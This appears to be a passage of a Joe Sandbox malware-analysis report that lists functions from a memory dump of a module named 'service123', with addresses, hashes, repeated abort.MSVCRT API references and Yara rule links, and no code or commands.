Opcode ID: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction ID: 4c31c2c44e2b41e17abc87313722d6ea77f6155a5d8abc06c8937b87e7d3abb2
Opcode Fuzzy Hash: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction Fuzzy Hash: CFC012719051045BCF40EF3480C00BCF7F06B43248F525858C094D7A00DB75C846DF46

Function 6C30AF80 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: d4d4515290241909b02ec1b52cadef5658dc9729157c878546472ed9514c6974
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 81C080B4C0434047C2007F38D10616CF9706F51104FC42C5CD4C413701D735C51C4A5B

Function 6C2F28FA Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

L:=l, xrefs: 6C2F2929

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: L:=l
API String ID: 4206212132-1485877340
Opcode ID: cbefe7b7da784648f852554c33927682aa9f2be7bdf402e66fbe43a5cd58a897
Instruction ID: 724ddb747c67009e6b760587bcf1625aab01c6e2530294db2f89f3931d079fe9
Opcode Fuzzy Hash: cbefe7b7da784648f852554c33927682aa9f2be7bdf402e66fbe43a5cd58a897
Instruction Fuzzy Hash: 1211C2B2642205CBE708FF1CE892F59B7B0FB21309F019A48D594D7A11D739E818CF91

Function 6C2F2A2F Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

V:=l, xrefs: 6C2F2A5E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: V:=l
API String ID: 4206212132-1925201791
Opcode ID: 0e96bd923c2372570a7563687242580328805720da6a4b554d741f6bb930bf50
Instruction ID: 8d78e2b861a3cfce2878d8203cacc604de904f279d308b8068684e4cd3c6dc9d
Opcode Fuzzy Hash: 0e96bd923c2372570a7563687242580328805720da6a4b554d741f6bb930bf50
Instruction Fuzzy Hash: 9211D3B2642205CBE308FF1CE492F59B7B0FB11309F019A48D594D7A11D739E818CF91

Function 6C2F29B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

`:=l, xrefs: 6C2F29E0

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: `:=l
API String ID: 4206212132-3316130787
Opcode ID: 2618a243c29ec250e08d9fe92ada1e29d7af98608cf7a47cd595a67c2c9fbb26
Instruction ID: ea2fd9383be35fb4f9f3cac421cc0a7f8ff385229d08cc4ee10a315b3a4d215c
Opcode Fuzzy Hash: 2618a243c29ec250e08d9fe92ada1e29d7af98608cf7a47cd595a67c2c9fbb26
Instruction Fuzzy Hash: 8CF030F2645205CBD704EF18E0D5B6AB770FF12308F019A48C4949BB05D775E869CF86

Function 6C2FBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

@, xrefs: 6C2FBAB1

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 3e942ff8c82cb4a89c34bef5b26b1664ac4e412973b144b41a6f07902916e7c5
Instruction ID: 80ecae83f610c8230ecbf49cf143c09acfc5aa020d28c570687ab5c89184f84d
Opcode Fuzzy Hash: 3e942ff8c82cb4a89c34bef5b26b1664ac4e412973b144b41a6f07902916e7c5
Instruction Fuzzy Hash: 2EB1173264931E8FC710CE2CC4D0769F7E6AB85314F498569EDA597B95C335EC0ACB82

Function 6C2F2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4363e62a78520787c39a8ef3ba55bbc624b8b0326e95d550089cc4381d9af128
Instruction ID: bf4d68063518fdc6afcf5d6b58d736208db671082df95ff1f4055896e8516e1a
Opcode Fuzzy Hash: 4363e62a78520787c39a8ef3ba55bbc624b8b0326e95d550089cc4381d9af128
Instruction Fuzzy Hash: 4BC1DDF168024A8FD7048F28C48475AF7E2AB46308F449969DCA8CFB05D779E94B8F90

Function 6C2FB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66035d50beb4595e9749a2cf4447cd2189063d04f317ec60b0b95e0b51b58383
Instruction ID: 031fd92c39ebbb56f28aa75372b5701bf4e2e03209e880bf195fa1d533622d70
Opcode Fuzzy Hash: 66035d50beb4595e9749a2cf4447cd2189063d04f317ec60b0b95e0b51b58383
Instruction Fuzzy Hash: 4541C47664934E9FE711DF29C080726BBF0AF85318F18859DEDA54BB42C335E846CB41

Function 6C2F29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 451ceff7aa38ccc5becc644b23529abd906f9d3f6642bef7f1954090daee7318
Instruction ID: f5c166d86951fdf04d44dbd5de6e7267af196464f9167e058a99c56ed774df78
Opcode Fuzzy Hash: 451ceff7aa38ccc5becc644b23529abd906f9d3f6642bef7f1954090daee7318
Instruction Fuzzy Hash: 930116B2641205CBE704EF2CD891B69B7B0FB11309F019A48C584DBB11D735E868CF92

Function 6C2F28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
